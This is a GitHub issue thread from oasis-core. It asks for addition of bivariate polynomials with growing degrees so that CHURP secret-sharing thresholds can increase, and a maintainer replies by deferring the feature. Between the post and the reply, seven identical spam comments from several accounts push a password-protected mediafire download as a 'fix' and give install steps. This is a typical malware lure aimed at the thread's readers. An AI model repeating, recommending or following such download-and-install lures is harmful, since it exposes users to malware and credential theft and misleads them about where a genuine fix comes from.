### ISSUE TITLE
no way to add two bivariates polynomials (esp w/ different max degrees)

### ISSUE THREAD

**Issue by bennetyee** [oasisprotocol/oasis-core#5832]
https://github.com/oasisprotocol/oasis-core/blob/18da8bc49d92a543795246b8bb7fb574df070eec/secret-sharing/src/poly/bivariate.rs#L15

while we don't need to do proactive verifiable secret sharing by adding zero holed bivariate polynomials since we can do churp dimension switching and get the same effect, it will be useful to be able to add a zero holed bivariate polynomial to a bivariate used for churp, esp with the max degree(s) growing.

the rationale for wanting this ability is this:  we would like to be able to optionally grow the reconstruction threshold (as well as the number of shareholders for availability) as the value of the secrets being protected grows.  in the context of a blockchain system, this would correspond to something like the total value locked increasing over time as the usage increases.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by peternose** [comment]
Agree, adding `add` functionality will be needed in the future once we support changing the threshold. The current version doesn't do that, so I would postpone this to later.
